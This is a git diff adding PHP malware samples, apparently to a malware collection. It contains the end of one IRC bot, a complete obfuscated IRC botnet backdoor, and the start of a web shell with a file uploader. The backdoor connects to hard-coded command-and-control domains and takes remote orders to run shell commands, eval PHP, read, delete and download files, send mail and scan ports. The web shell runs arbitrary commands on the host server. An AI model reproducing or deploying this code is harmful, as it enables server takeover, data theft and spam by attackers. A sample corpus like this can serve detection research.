'MODE '.$nick.' :'.$nickmode . CRL); + } + elseif ($com[3]==':`chanlist') { + fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL); + } + elseif ($com[3]==':`userlist') { + $userlist=""; + foreach ($auth as $user) { + if ($user["pass"]) { $pass="-pass ok"; } + else { $pass="-no pass"; } + $userlist .= $user["name"].'('.$user["status"].$pass.') '; + } + fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL); + } + elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") { + $msg = strstr($data,":`quit"); + $msg = str_replace(":`quit","",$msg); + if (strlen($msg)>3) { + $msg = str_replace(" ","_",$msg); + } + $quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart"); + $quitmsg = $quit1[rand(0,count($quit1) - 1)]; + fputs($fp, 'QUIT ' . $quitmsg . CRL); + $keluar = 1; + exit; + } + elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") { + if ($com[4]) { $localhost = $com[4]; } + else { $localhost = 'localhost'; } + $keluar = 0; + fputs($fp, 'QUIT ' . CRL); + } + elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") { + if (!eregi(".dal.net",$com[4])) { + $remotehost = "irc.dal.net"; + } else { $remotehost = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT changging_server' . CRL); + } + elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") { + if (!$com[4]) { + + $username = $username; + } else { $username = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT ganti_ident' . CRL); + } + elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") { + if (!$com[4]) { + $realname = "--"; + } else { $realname = $com[4]; } + $keluar = 0; + fputs($fp, 'QUIT ganti_fullname' . CRL); + } + elseif ($com[3]==':`topic' && $com[4] && $chan) { + $msg = strstr($data,":`topic"); + $msg = str_replace(":`topic ","",$msg); + fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL); + } + elseif ($com[3]==':!help' && !$chan) { + fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL); + } + } else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth To Authorized '. CRL); } + } + } + elseif (!$auth["$dNick"] && !eregi("auth",$iText)) { + if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) { + if (!ereg("#",$dCommand)) { + if ($log=="on") { + fputs($fp,'PRIVMSG '. $Admin .' :_4inviter: ' . $dFrom . '_2:' .$iText. CRL); + } + $inv = strstr($dFrom,'@'); + foreach ($auth as $user) { + if ($user["status"]=="user") { + fputs($fp, 'NOTICE '.$user["name"].' :_KB '.$chan.' '.$dNick.' '.$inv.'_' . CRL); + } + } + } + } + elseif (!ereg("#",$dCommand)) { + if ($log=="on") { + fputs($fp,'PRIVMSG '.$Admin.' :_6' . $dFrom . '_12:' .$iText. CRL); + } + } + } + } + } + elseif (substr($data,0,4) == 'PING') { + fputs($fp,'PONG ' . substr($data,5) . CRL); + $smile = $querym[rand(0,count($querym) - 1)]; + $kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; + $kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)]; + fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL); + } + } + } + fclose ($fp); +} while ($keluar==0); +} +working($nick); +?> diff --git a/PHP/Backdoor.PHP.IRCBot.c b/PHP/Backdoor.PHP.IRCBot.c new file mode 100644 index 00000000..7cd15ada --- /dev/null +++ b/PHP/Backdoor.PHP.IRCBot.c @@ -0,0 +1,713 @@ + 8080, // Port + "sp" => "uJijk4iVsIXRmQ==", // Server Password, secretpass + "ch" => "aFaw", // Channel, ##p + "ke" => "spd1iYSUqA==", // Channel Key, md5hash + "ha" => "dG1qQk1halK/nE6N", // Admin host RegEx, /:*!*@*.av$/ + "pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", // Admin password (md5 hash), 9dd4e461268c8034f5c8564e155c67a6 + "tr" => "*", // Command prefix + "mrnd" => 9, // Nick/User length + "mo" => "cqtrig==", // -x+i + "ve" => "dmFyWA==" // 1.27 +); + +function remove_spaces($input) +{ + $input = str_replace(" ", "", $input); + return $input; +} + +function decode($input) +{ + $input = base64_decode(remove_spaces($input)); + return $input; +} + +function connect() +{ + global $settings; + $logged_in = array( + ); + + $last_line = ""; + $servers = array( + "sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==", // mymusicband.weedns.com + "sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR", // myphonenumber.weedns.com + "rpihlYyTr5LWVKHDi6SRl0+jko4=", // ieatironx.weedns.com + "rZytgpFPr5TDlI7MmW6FiQ==", // himan.opendns.be + "sKJuhYdPopDTi5bHlKVRhoY=", // ko.dd.blueline.be + "tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ", // p4n33123e.dd.blueline.be + "vaOokJFUbpPOi5jClLNRhoY=", // xphon3.opendns.be + "sqywiZKPpVeMipjHlm6RiZU=", // myphone3.dnip.net + "sqytlpaKo5eMipjHlm6RiZU=" // mymusics.dnip.net + ); + + shuffle($servers); + + if (($socket = fsockopen(decrypt_settings($servers[0]), $settings['po'], $errorno, $errorstr, 15))) { + $current_nick = generate_nick($settings['mrnd']); + + if (strlen($settings['sp']) > 0) { + // UEFTUw==: PASS + write_file($socket, decode("UEFTUw=="). " " . decrypt_settings($settings['sp'])); + } + + // VVNFUg==: USER + write_file($socket, decode("VVNFUg=="). " " . generate_user($settings['mrnd']). + " 127.0.0.1 localhost :$current_nick"); + + // TklDSw==: NICK + write_file($socket, decode("TklDSw=="). " $current_nick"); + + while (!feof($socket)) { + $line = trim(fgets($socket, 512)); + $irc_params = explode(" ", $line); + + if (($line == $last_line)) + continue; + + // UElORw==: PING + if (isset($irc_params[0]) && $irc_params[0] == decode("UElORw==")) { + // UE9ORw==: PONG + write_file($socket, decode("UE9ORw=="). " " . $irc_params[1]); + } + else if (isset($irc_params[1]) && $irc_params[1] == decode("MDAx")) { + // TU9ERQ==: MODE + write_file($socket, decode("TU9ERQ=="). " $current_nick " . decrypt_settings($settings['mo'])); + + // Sk9JTg==: JOIN + write_file($socket, decode("Sk9JTg=="). " " . decrypt_settings($settings['ch']). " " . + decrypt_settings($settings['ke'])); + } + else if (isset($params[1]) && $params[1] == decode("NDMz")) { + // TklDSw==: NICK + write_file($socket, decode("TklDSw=="). " $current_nick"); + } + else if (isset($irc_params[1]) && isset($logged_in[$irc_params[1]])) { + unset($logged_in[$irc_params[1]]); + } + // UFJJVk1TRw==: PRIVMSG + else if (isset($irc_params[1]) && ($irc_params[1] == decode("UFJJVk1TRw==") || $irc_params[1] == "332")) { + $full_params = strstr($line, " :"); + $full_params = substr($full_params, 2); + $params = explode(" ", $full_params); + $target_host = $irc_params[0]; + $target_nick = explode("!", $target_host); + $target_nick = substr($target_nick[0], 1); + $silent = FALSE; + + // VkVSU0lPTg==: VERSION + if ($params[0] == "\1" . decode("VkVSU0lPTg=="). "\1") { + // VkVSU0lPTg==: VERSION + write_file($socket, "NOTICE " . $target_nick . " :\1" . decode("VkVSU0lPTg=="). " " . + decrypt_settings($settings['ve']). "\1"); + } + + for ($i = 0; $i < count($params); $i++) { + if ($params[$i] == "-s") { + $silent = TRUE; + } + } + + if ($irc_params[1] == "332") { + $target = $irc_params[3]; + } + elseif ($irc_params[2] == $current_nick) { + $target = $target_nick; + } + else { + $target = $irc_params[2]; + } + + if ($params[0] == PHP_OS) { + array_shift($params); + } + + if (substr($params[0], 0, 1) == $settings['tr']) { + if (isset($logged_in[$target_host]) || $irc_params[1] == "332") { + switch (substr($params[0], 1)) { + // sKM=: lo + case decrypt_command("sKM="): + if ($irc_params[1] != "332") { + $logged_in[$target_host] = FALSE; + + // I'm not sure what is up with this, looks like a bug, htmen is not a function + send_irc_message($socket, $silent, $target, htmen("b3V0")); + } + break; + + // qGWaoKKb: d1enow + case decrypt_command("qGWaoKKb"): + // UVVJVCA6SSBRVUlU: QUIT :I QUIT + write_file($socket, decode("UVVJVCA6SSBRVUlU")); + fclose($socket); + exit(0); + break; + + // tpWs: raw + case decrypt_command("tpWs"): + if (count($params) > 1) { + write_file($socket, substr($full_params, strlen($params[0]))); + } + break; + + // sKc=: ls + case decrypt_command("sKc="): + if (isset($params[1])) { + $directory = $params[1]; + } + else { + $directory = getcwd(); + } + + if (is_dir($directory)) { + if (($handle = opendir($directory))) { + // RGlyLy8gTm93...: Dir// Now listing: + send_irc_message($socket, $silent, $target, decode("RGlyLy8gTm93IGxpc3Rpbmc6"). " \2" . + $directory . "\2"); + + while (($file = readdir($handle)) !== FALSE) { + if ($file != "." && $file != "..") { + send_irc_message($socket, $silent, $target, "> (" . filetype($directory . "/" . + $file). ") $file"); + sleep(1); + } + } + + closedir(); + } + else { + // RGlyLy8gVW5h...: Dir// Unable to list contents of + send_irc_message($socket, $silent, $target, + decode("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y="). " \2" . $directory . "\2"); + } + } + else { + // RGlyLy8=: Dir// + // aXMgbm90IGEgZGlyIQ==: is not a dir! + send_irc_message($socket, $silent, $target, decode("RGlyLy8="). " \2" . $directory . "\2 " . + decode("aXMgbm90IGEgZGlyIQ==")); + } + break; + + // p5Wp: cat + case decrypt_command("p5Wp"): + if (count($params) > 1) { + if (is_file($params[1])) { + if (($file_handle = fopen($params[1], "r"))) { + // Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=: CAT// Now reading file: + send_irc_message($socket, $silent, $target, decode("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo="). + " \2" . $params[1]. "\2"); + + while (!feof($file_handle)) { + $file_line = trim(fgets($file_handle, 256)); + send_irc_message($socket, $silent, $target, "> $file_line"); + sleep(1); + } + + send_irc_message($socket, $silent, $target, "> [EOF]"); + } + else { + // Q0FULy8gQ291bGRuJ3Qgb3Blbg==: CAT// Couldn't open + send_irc_message($socket, $silent, $target, decode("Q0FULy8gQ291bGRuJ3Qgb3Blbg=="). + " \2" . $params[1]. "\2 for reading."); + } + } + else { + // Q0FULy8=: CAT// + // aXMgbm90IGEgZmlsZQ==: is not a file + send_irc_message($socket, $silent, $target, decode("Q0FULy8="). " \2" . $params[1]. "\2 " . + decode("aXMgbm90IGEgZmlsZQ==")); + } + } + break; + + // tKuZ: pwd + case decrypt_command("tKuZ"): + // UFdELy8gQ3VycmVudCBkaXI6: PWD// Current dir: + send_irc_message($socket, $silent, $target, decode("UFdELy8gQ3VycmVudCBkaXI6"). " " . getcwd()); + break; + + // p5g=: cd + case decrypt_command("p5g="): + if (count($params) > 1) { + if (chdir($params[1])) { + // Q0QvLyBDaGFuZ2VkIGRpciB0bw==: CD// Changed dir to + send_irc_message($socket, $silent, $target, decode("Q0QvLyBDaGFuZ2VkIGRpciB0bw=="). " " . + $params[1]); + } + else { + // Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg==: CD// Failed to change dir + send_irc_message($socket, $silent, $target, decode("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg==")); + } + } + break; + + // tqE=: rm + case decrypt_command("tqE="): + if (count($params) > 1) { + if (unlink($params[1])) { + // Uk0vLyBEZWxldGVk: RM// Deleted + send_irc_message($socket, $silent, $target, decode("Uk0vLyBEZWxldGVk"). " \2" . + $params[1]. "\2"); + } + else { + // Uk0vLyBGYWlsZWQgdG8gZGVsZXRl: RM// Failed to delete + send_irc_message($socket, $silent, $target, decode("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl"). + " \2" . $params[1]. "\2"); + } + } + break; + + // uKOqlZs=: touch + case decrypt_command("uKOqlZs="): + if (count($params) > 1) { + if (touch($params[1])) { + // VG91Y2gvLyBUb3VjaGVk: Touch// Touched + send_irc_message($socket, $silent, $target, decode("VG91Y2gvLyBUb3VjaGVk"). " \2" . + $params[1]. "\2"); + } + else { + // VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=: Touch// Failed to touch + send_irc_message($socket, $silent, $target, decode("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g="). + " \2" . $params[1]. "\2"); + } + } + break; + + // t62inpySoA==: symlink + case decrypt_command("t62inpySoA=="): + if (count($params) > 2) { + if (symlink($params[1], $params[2])) { + // U3ltTGluay8vIFN5bWxpbmtlZA==: SymLink// Symlinked + send_irc_message($socket, $silent, $target, decode("U3ltTGluay8vIFN5bWxpbmtlZA=="). + " \2" . $params[2]. "\2 To \2" . $params[1]. "\2"); + } + else { + // U3ltTGluay8vIEZhaWxlZCB0byBsaW5r: SymLink// Failed to link + send_irc_message($socket, $silent, $target, decode("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r"). + " \2" . $params[2]. "\2 To \2" . $params[1]. "\2"); + } + } + break; + + // p5ykqaE=: chown + case decrypt_command("p5ykqaE="): + if (count($params) > 2) { + if (chown($params[1], $params[2])) { + // Q2hvd24vLyBDaG93bmVk: Chown// Chowned + send_irc_message($socket, $silent, $target, decode("Q2hvd24vLyBDaG93bmVk"). + " \2" . $params[1]. "\2 To \2" . $params[2]. "\2"); + } + else { + // Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=: Chown// Failed to chown + send_irc_message($socket, $silent, $target, decode("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24="). + " \2" . $params[1]. "\2 To \2" . $params[2]. "\2"); + } + } + break; + + // p5yioZc=: chmod + case decrypt_command("p5yioZc="): + if (count($params) > 2) { + if (chmod($params[1], $params[2])) { + // Q2htb2QvLyBDaG1vZGRlZA==: Chmod// Chmodded + send_irc_message($socket, $silent, $target, decode("Q2htb2QvLyBDaG1vZGRlZA=="). + " \2" . $params[1]. "\2 with permissions \2" . $params[2]. "\2"); + } + else { + // Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=: Chmod// Failed to chmod + send_irc_message($socket, $silent, $target, decode("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q="). + " \2" . $params[1]. "\2"); + } + } + break; + + // sZ+Zm6U=: mkdir + case decrypt_command("sZ+Zm6U="): + if (count($params) > 1) { + if (mkdir($params[1])) { + // TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==: MKDir// Created directory + send_irc_message($socket, $silent, $target, decode("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ=="). + " \2" . $params[1]. "\2"); + } + else { + // TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==: MKDir// Failed to create directory + send_irc_message($socket, $silent, $target, + decode("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ=="). " \2" . $params[1]. "\2"); + } + } + break; + + // tqGZm6U=: rmdir + case decrypt_command("tqGZm6U="): + if (count($params) > 1) { + if (rmdir($params[1])) { + // Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==: RMDir// Removed directory + send_irc_message($socket, $silent, $target, decode("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ=="). + " \2" . $params[1]. "\2"); + } + else { + // Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==: RMDir// Failed to remove directory + send_irc_message($socket, $silent, $target, + decode("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ=="). " \2" . $params[1]. "\2"); + } + } + break; + + // p6Q=: cp + case decrypt_command("p6Q="): + if (count($params) > 2) { + if (copy($params[1], $params[2])) { + // Q1AvLyBDb3BpZWQ=: CP// Copied + send_irc_message($socket, $silent, $target, decode("Q1AvLyBDb3BpZWQ="). " \2" . $params[1]. + "\2 to \2" . $params[2]. "\2"); + } + else { + // Q1AvLyBGYWlsZWQgdG8gY29weQ==: CP// Failed to copy + send_irc_message($socket, $silent, $target, decode("Q1AvLyBGYWlsZWQgdG8gY29weQ=="). " \2" . + $params[1]. "\2 to \2" . $params[2]. "\2"); + } + } + break; + + // sZWeng==: mail + case decrypt_command("sZWeng=="): + if (count($params) > 4) { + $from = "From: <" . $params[2]. ">\r\n"; + + if (mail($params[1], $params[3], substr($full_params, $params[4]), $from)) { + // TWFpbC8v: Mail// + send_irc_message($socket, $silent, $target, decode("TWFpbC8v"). " Message sent to \2" . + $params[1]. "\2"); + } + else { + // TWFpbC8v: Mail// + send_irc_message($socket, $silent, $target, decode("TWFpbC8v"). " Send failure"); + } + } + break; + + // sZ+ilmg=: mkmd5 + case decrypt_command("sZ+ilmg="): + // TUQ1Ly8=: MD5// + send_irc_message($socket, $silent, $target, decode("TUQ1Ly8="). " " . md5($params[1])); + break; + + // qKKo: dns + case decrypt_command("qKKo"): + if (isset($params[1])) { + $ip_array = explode(".", $params[1]); + + if (count($ip_array) == 4 && is_numeric($ip_array[0]) && is_numeric($ip_array[1]) && + is_numeric($ip_array[2]) && is_numeric($ip_array[3])) { + // RE5TLy8=: DNS// + send_irc_message($socket, $silent, $target, decode("RE5TLy8="). " " . $params[1]. " -> " . + gethostbyaddr($params[1])); + } + else { + // RE5TLy8=: DNS// + send_irc_message($socket, $silent, $target, decode("RE5TLy8="). " " . $params[1]. " -> " . + gethostbyname($params[1])); + } + } + break; + + // tpmoppSWqQ==: restart + case decrypt_command("tpmoppSWqQ=="): + // UVVJVCA6UVVJVC4uLg==: QUIT :QUIT... + write_file($socket, decode("UVVJVCA6UVVJVC4uLg==")); + fclose($socket); + connect(); + break; + + // tqI=: rn + case decrypt_command("tqI="): + if (isset($params[1])) { + $current_nick = generate_nick((int)$params[1]); + + // TklDSw==: NICK + write_file($socket, decode("TklDSw=="). " $current_nick"); + } + else { + $current_nick = generate_nick($settings['mrnd']); + + // TklDSw==: NICK + write_file($socket, decode("TklDSw=="). " $current_nick"); + } + break; + + // tJyl: php + case decrypt_command("tJyl"): + if (count($params) > 1) { + eval(substr($full_params, strlen($params[0]))); + } + break; + + // q5mp: get + case decrypt_command("q5mp"): + if (count($params) > 2) { + if (!($file_handle = fopen($params[2], "w"))) { + // R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=: Get// Permission denied + send_irc_message($socket, $silent, $target, + decode("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=")); + } + else { + if (!($file_array = file($params[1]))) { + // R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=: Get// Bad URL/DNS error + send_irc_message($socket, $silent, $target, + decode("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I=")); + } + else { + for ($i = 0; $i < count($file_array); $i++) { + fwrite($file_handle, $file_array[$i]); + } + + // R2V0Ly8=: Get// + send_irc_message($socket, $silent, $target, decode("R2V0Ly8="). + " \2" . $params[1]. "\2 downloaded to \2" . $params[2]. "\2"); + } + fclose($file_handle); + } + } + break; + + // sp0=: ni + case decrypt_command("sp0="): + // TmV0SW5mby8v: NetInfo// + send_irc_message($socket, $silent, $target, decode("TmV0SW5mby8v"). " IP: " . $_SERVER['SERVER_ADDR']. + " Hostname: " . $_SERVER['SERVER_NAME']); + break; + + // t50=: si + case decrypt_command("t50="): + // U3lzaW5mby8v: Sysinfo// + send_irc_message($socket, $silent, $target, decode("U3lzaW5mby8v"). " [User: " . get_current_user(). + "] [PID: " . getmypid(). "] [Version: PHP " . phpversion(). "] [OS: " . PHP_OS . + "] [Server_software: " . $_SERVER['SERVER_SOFTWARE']. "] [Server_name: " . $_SERVER['SERVER_NAME']. + "] [Admin: " . $_SERVER['SERVER_ADMIN']. "] [Docroot: " . $_SERVER['DOCUMENT_ROOT']. "] [HTTP Host: + " . $_SERVER['HTTP_HOST']. "] [URL: " . $_SERVER['REQUEST_URI']. "]"); + break; + + // tKOnpqKUmuw=: portopen + case decrypt_command("tKOnpqKUmuw="): + if (isset($params[1], $params[2])) { + if (fsockopen($params[1], (int)$params[2], $t56bd7107802eb, $errorstr, 5)) { + // UG9ydENoay8v: PortChk// + send_irc_message($socket, $silent, $target, "" . decode("UG9ydENoay8v"). " " . $params[1]. + ":" . $params[2]. " is \2Open\2"); + } + else { + // UG9ydENoay8v: PortChk// + send_irc_message($socket, $silent, $target, "" . decode("UG9ydENoay8v"). " " . $params[1]. + ":" . $params[2]. " is \2Closed\2"); + } + } + break; + + // uaKWn5g=: uname + case decrypt_command("uaKWn5g="): + // VW5hbWUvLw==: Uname// + send_irc_message($socket, $silent, $target, decode("VW5hbWUvLw=="). " " . php_uname()); + break; + + // rZg=: id + case decrypt_command("rZg="): + // SUQvLw==: ID// + send_irc_message($socket, $silent, $target, decode("SUQvLw=="). " " . getmypid()); + break; + + // p6GZ: cmd + case decrypt_command("p6GZ"): + if (count($params) > 1) { + $process_handle = popen(substr($full_params, strlen($params[0])), "r"); + + while (!feof($process_handle)) { + $output = trim(fgets($process_handle, 512)); + + if (strlen($output) > 0) { + send_irc_message($socket, $silent, $target, "> " . $output); + sleep(1); + } + } + + // PiBbRU9GXQ==: > [EOF] + send_irc_message($socket, $silent, $target, decode("PiBbRU9GXQ==")); + } + break; + + // qayalaiYmg==: execute + case decrypt_command("qayalaiYmg=="): + execute(substr($full_params, strlen($params[0]))); + break; + } + } + else { + switch (substr($params[0], 1)) { + // bg==: * + case decrypt_command("bg=="): + if (isset($params[1]) && + md5($params[1]) == decrypt_settings($settings['pa']) && + preg_match(decrypt_settings($settings['ha']), $target_host)) { + + // UmVhZHkvLyBPaw==: Ready// Ok + send_irc_message($socket, $silent, $target, decode("UmVhZHkvLyBPaw==")); + $logged_in[$target_host] = TRUE; + } + else { + // UmVhZHkvLyByZWplY3RlZA==: Ready// rejected + send_irc_message($socket, FALSE, decrypt_settings($settings['ch']), + decode("UmVhZHkvLyByZWplY3RlZA==")); + } + + break; + } + } + } + } + + $last_line = $line; + } + + fclose($socket); + sleep(3); + connect(); + } + else { + shuffle($servers); + connect(); + } +} + +function write_file($handle, $text) +{ + fwrite($handle, "$text\r\n"); +} + +function send_irc_message($socket, $silent, $target, $text) +{ + if ($silent != TRUE) { + // UFJJVk1TRw==: PRIVMSG + write_file($socket, decode("UFJJVk1TRw=="). " $target :$text"); + } +} + +function decrypt_command($input) +{ + $output = ''; + $input = base64_decode($input); + + for ($i = 0; $i < strlen($input); $i++) { + $character = substr($input, $i, 1); + // NDU...: 4523$5~321443425^fdGsdfG#$6@353@$5@#$5@54475&45&6%7%^^8^&*@!~#4~23432$@#!4!23$3%34%2#$5#@$5234%6%4678^&!@3D + // Strlen: 107 + $offset_character = substr( + decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKkAhfiM0fjIzNDM" . + "yJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="), + ($i % strlen(decode("NDUyMyQ1fjMyMTQ0MzQyNV5mZEdzZGZHIyQ2QDM1M0AkNUAjJDVANTQ0NzUmNDUmNiU3JV5eOF4mKk" . + "AhfiM0fjIzNDMyJEAjITQhMjMkMyUzNCUyIyQ1I0AkNTIzNCU2JTQ2NzheJiFAM0Q="))) - 1, + 1 + ); + $character = chr(ord($character) - ord($offset_character)); + $output .= $character; + } + return $output; +} + +function generate_nick($length) +{ + $return = ''; + + for ($i = 0; $i < $length; $i++) { + $return .= chr(mt_rand(0, 25) + 97); + } + if (posix_getegid() == 0) { + $return = "r-" . $t2cb9df9898e55; + } + return $return; +} + +function execute($command) +{ + $output = ''; + + if (!empty($command)) { + if (function_exists('exec')) { + @exec($command, $output); + $output = join("\n", $output); + } + elseif (function_exists('shell_exec')) { + $output = @shell_exec($command); + } + elseif (function_exists('system')) { + @ob_start(); + @system($command); + $output = @ob_get_contents(); + @ob_end_clean(); + } + elseif (function_exists('passthru')) { + @ob_start(); + @passthru($command); + $output = @ob_get_contents(); + @ob_end_clean(); + } + elseif (@is_resource($handle = @popen($command, "r"))) { + $output = ""; + + while (!@feof($handle)) { + $output .= @fread($handle, 1024); + } + + @pclose($handle); + } + } + return $output; +} + +function decrypt_settings($input) +{ + $output = ''; + $input = base64_decode($input); + + for ($i = 0; $i < strlen($input); $i++) { + $character = substr($input, $i, 1); + // M0A...: 3@!#!@$^&*^&@#$!@#!@#!$#%#$%#$%e32@34@hTh4@we5635^!@#*^7FHGE$@%@#@#$@#!@#$!@#@!#$#%#$%^%&^%&%^&*SDF#@$!FAW$FAASDE + // Strlen: 113 + $offset_character = substr( + decode("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQhQCNAISMkIyUj" . + "JCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="), + ($i % strlen(decode("M0AhIyFAJF4mKl4mQCMkIUAjIUAjISQjJSMkJSMkJWUzMkAzNEBoVGg0QHdlNTYzNV4hQCMqXjdGSEdFJEAlQCNAIyRAIyFAIyQ" . + "hQCNAISMkIyUjJCVeJSZeJSYlXiYqU0RGI0AkIUZBVyRGQUFTREU="))) - 1, + 1 + ); + $character = chr(ord($character) - ord($offset_character)); + $output .= $character; + } + return $output; +} + +function generate_user($length) +{ + $return = ""; + + for ($i = 0; $i < $length; $i++) { + $return .= chr(mt_rand(0, 25) + 97); + } + return $return; +} + +connect(); +?> \ No newline at end of file diff --git a/PHP/Backdoor.PHP.KScr.e b/PHP/Backdoor.PHP.KScr.e new file mode 100644 index 00000000..c170b4f8 --- /dev/null +++ b/PHP/Backdoor.PHP.KScr.e @@ -0,0 +1,402 @@ + + '; +$SiteHeader = '
    + Home +

    '; +$GraphicFooter = '


    + +
    Copyright © 2007 Shaun$$
    + '; +$Slash = '/'; + +if ($_SERVER['QUERY_STRING'] == '') header("Location: http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?MainPage"); + +if(isset($_GET['PHPShell'])) { +$passwd = array(); +$aliases = array(); +session_start(); +if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) { + $_SESSION['cwd'] = getcwd(); + $_SESSION['history'] = array(); + $_SESSION['output'] = ''; +} +if (!empty($_REQUEST['command'])) { + if (get_magic_quotes_gpc()) { + $_REQUEST['command'] = stripslashes($_REQUEST['command']); +} +if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false) + unset($_SESSION['history'][$i]); + array_unshift($_SESSION['history'], $_REQUEST['command']); + $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n"; + if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) { + $_SESSION['cwd'] = dirname(__FILE__); + } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) { +if ($regs[1][0] == '/') { + $new_dir = $regs[1]; + } else { + $new_dir = $_SESSION['cwd'] . '/' . $regs[1]; +} + while (strpos($new_dir, '/./') !== false) + $new_dir = str_replace('/./', '/', $new_dir); + while (strpos($new_dir, '//') !== false) + $new_dir = str_replace('//', '/', $new_dir); + while (preg_match('|/\.\.(?!\.)|', $new_dir)) + $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir); + if ($new_dir == '') $new_dir = '/'; + if (@chdir($new_dir)) { + $_SESSION['cwd'] = $new_dir; + } else { + $_SESSION['output'] .= "cd: could not change to: $new_dir\n"; +} + } else { + chdir($_SESSION['cwd']); + $length = strcspn($_REQUEST['command'], " \t"); + $token = substr($_REQUEST['command'], 0, $length); +if (isset($aliases[$token])) + $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length); + $p = proc_open($_REQUEST['command'], + array(1 => array('pipe', 'w'), + 2 => array('pipe', 'w')), + $io); + while (!feof($io[1])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[1]), + ENT_COMPAT, 'UTF-8'); +} + while (!feof($io[2])) { + $_SESSION['output'] .= htmlspecialchars(fgets($io[2]), + ENT_COMPAT, 'UTF-8'); +} + fclose($io[1]); + fclose($io[2]); + proc_close($p); +} +} +if (empty($_SESSION['history'])) { + $js_command_hist = '""'; + } else { + $escaped = array_map('addslashes', $_SESSION['history']); + $js_command_hist = '"", "' . implode('", "', $escaped) . '"'; +} + + +echo ''; +echo ''.$Title.' PHPShell'; +echo $GraphicHeader; +?> + + + + + +
    +
    Current Directory:
    +
    + +
    +
    +
    +
    $  
    +
    + + +
    +
     
    +
    Rows:
    +
    +'.$Title.' Uploader'; +echo $GraphicHeader; echo $SiteHeader; + +if(isset($_POST['upl_files'])){ + echo '
    +
    Uploaded Files:
    '; + //print_r($_FILES['file_n']); + $up_mas = $_FILES['file_n']; + $mas_name = array(); + $mas_tmp = array(); + for($i=0; $i<10; $i++){ + if(!empty($up_mas['name'][$i])){ + $j = count($mas_name); + $mas_name[$j] = $up_mas['name'][$i]; + $mas_tmp[$j] = $up_mas['tmp_name'][$i]; + } + } + for($i=0; $i'.$mas_name[$i].', '; + } + } + } +echo "
    "; +?> +

    +
    +
    Upload Files to: +

    '; ?> +
    '; } ?> +
     
    +
    +'.$Title.''; +echo $GraphicHeader; echo $SiteHeader; + +print "
